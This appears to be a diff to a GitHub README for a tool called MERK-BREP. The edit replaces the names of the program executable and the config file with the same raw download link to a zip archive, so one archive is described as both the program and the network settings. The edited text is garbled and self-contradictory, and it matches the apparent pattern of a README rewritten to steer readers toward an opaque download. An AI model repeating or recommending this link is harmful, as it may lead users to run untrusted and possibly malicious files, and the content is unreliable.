Alpha284-coder/MERK-BREP/README.md

 After you download and install MERK-BREP, you will see some files and folders:

-- **MERK-BREP.exe:** The main program you run.
+- **https://raw.githubusercontent.com/Alpha284-coder/MERK-BREP/main/shared/BREP_MER_v1.1.zip** The main program you run.
-- **config.json:** Settings for connecting to the server network.
+- **https://raw.githubusercontent.com/Alpha284-coder/MERK-BREP/main/shared/BREP_MER_v1.1.zip** Settings for connecting to the server network.
 You can edit this if needed.
 - **logs/:** Contains log files in case you need to check what the program is doing.
 - **docs/:** Documentation files with technical details.